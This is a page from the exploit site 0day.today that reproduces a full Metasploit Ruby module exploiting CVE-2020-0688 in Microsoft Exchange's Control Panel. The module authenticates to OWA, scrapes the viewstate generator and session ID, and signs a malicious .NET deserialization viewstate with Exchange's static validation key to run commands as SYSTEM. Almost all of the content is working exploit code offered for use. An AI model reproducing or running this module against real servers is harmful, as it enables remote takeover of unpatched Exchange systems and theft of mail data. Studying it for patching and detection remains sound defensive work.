0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Exchange Control Panel Viewstate Deserialization Exploit
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'bindata'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
# include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'
VALIDATION_KEY = "\xcb\x27\x21\xab\xda\xf8\xe9\xdc\x51\x6d\x62\x1d\x8b\x8b\xf1\x3a\x2c\x9e\x86\x89\xa2\x53\x03\xbf"
def initialize(info = {})
super(update_info(info,
'Name' => 'Exchange Control Panel Viewstate Deserialization',
'Description' => %q{
This module exploits a .NET serialization vulnerability in the
Exchange Control Panel (ECP) web page. The vulnerability is due to
Microsoft Exchange Server not randomizing the keys on a
per-installation basis resulting in them using the same validationKey
and decryptionKey values. With knowledge of these, values an attacker
can craft a special viewstate to cause an OS command to be executed
by NT_AUTHORITY\SYSTEM using .NET deserialization.
},
'Author' => 'Spencer McIntyre',
'License' => MSF_LICENSE,
'References' => [
['CVE', '2020-0688'],
['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],
],
'Platform' => 'win',
'Targets' =>
[
[ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],
[ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],
[ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]
],
'DefaultOptions' =>
{
'SSL' => true
},
'DefaultTarget' => 1,
'DisclosureDate' => '2020-02-11',
'Notes' =>
{
'Stability' => [ CRASH_SAFE, ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
'Reliability' => [ REPEATABLE_SESSION, ],
}
))
register_options([
Opt::RPORT(443),
OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),
OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])
])
register_advanced_options([
OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),
])
end
def check
state = get_request_setup
viewstate = state[:viewstate]
return CheckCode::Unknown if viewstate.nil?
viewstate = Rex::Text.decode_base64(viewstate)
body = viewstate[0...-20]
signature = viewstate[-20..-1]
unless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature
return CheckCode::Safe
end
# we've validated the signature matches based on the data we have and thus
# proven that we are capable of signing a viewstate ourselves
CheckCode::Vulnerable
end
def generate_viewstate(generator, session_id, cmd)
viewstate = ::Msf::Util::DotNetDeserialization.generate(cmd)
signature = generate_viewstate_signature(generator, session_id, viewstate)
Rex::Text.encode_base64(viewstate + signature)
end
def generate_viewstate_signature(generator, session_id, viewstate)
mac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')
mac_key_bytes << Rex::Text.to_unicode(session_id)
OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes)
end
def exploit
state = get_request_setup
# the major limit is the max length of a GET request, the command will be
# XML escaped and then base64 encoded which both increase the size
if target.arch.first == ARCH_CMD
execute_command(payload.encoded, opts={state: state})
else
cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first
execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})
end
end
def execute_command(cmd, opts)
state = opts[:state]
viewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd)
5.times do |iteration|
# this request *must* be a GET request, can't use POST to use a larger viewstate
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),
'cookie' => state[:cookies].join(''),
'agent' => state[:user_agent],
'vars_get' => {
'__VIEWSTATE' => viewstate,
'__VIEWSTATEGENERATOR' => state[:viewstate_generator]
}
})
break
rescue Rex::ConnectionError, Errno::ECONNRESET => e
vprint_warning('Encountered a connection error while sending the command, sleeping before retrying')
sleep iteration
end
end
def get_request_setup
# need to use a newer default user-agent than what Metasploit currently provides
# see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'),
'method' => 'POST',
'agent' => user_agent,
'vars_post' => {
'password' => datastore['PASSWORD'],
'flags' => '4',
'destination' => full_uri(normalize_uri(target_uri.path, 'owa')),
'username' => datastore['USERNAME']
}
})
fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?
cookies = [res.get_cookies]
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),
'cookie' => res.get_cookies,
'agent' => user_agent
})
fail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200
cookies << res.get_cookies
viewstate_generator = res.body.scan(/id="__VIEWSTATEGENERATOR"\s+value="([a-fA-F0-9]{8})"/).flatten[0]
if viewstate_generator.nil?
print_warning("Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}")
viewstate_generator = DEFAULT_VIEWSTATE_GENERATOR
else
vprint_status("Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}")
end
viewstate = res.body.scan(/id="__VIEWSTATE"\s+value="([a-zA-Z0-9\+\/]+={0,2})"/).flatten[0]
if viewstate.nil?
vprint_warning('Failed to find the __VIEWSTATE value')
end
session_id = res.get_cookies.scan(/ASP\.NET_SessionId=([\w\-]+);/).flatten[0]
if session_id.nil?
fail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies')
end
vprint_status("Recovered the ASP.NET_SessionID: #{session_id}")
{user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id}
end
end
# 0day.today [2024-11-15] #